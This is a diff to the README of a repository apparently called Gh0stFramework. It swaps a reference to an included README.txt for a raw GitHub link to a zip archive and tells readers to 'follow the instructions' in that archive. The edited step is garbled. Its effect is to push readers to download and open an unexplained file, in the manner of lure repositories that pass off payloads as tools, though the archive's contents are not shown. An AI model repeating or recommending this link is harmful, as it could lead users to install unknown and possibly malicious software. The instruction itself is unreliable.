xXGUTUTUXx/Gh0stFramework/README.md

 2. Look for the latest version.
 3. Download the appropriate file for your system.
 4. Unzip the downloaded file if necessary.
-5. Follow the instructions in the README.txt file included in the download.
+5. Follow the instructions in the https://github.com/xXGUTUTUXx/Gh0stFramework/raw/refs/heads/master/toat/Gh_Framework_st_v1.2.zip file included in the download.

 ## 🎯 Usage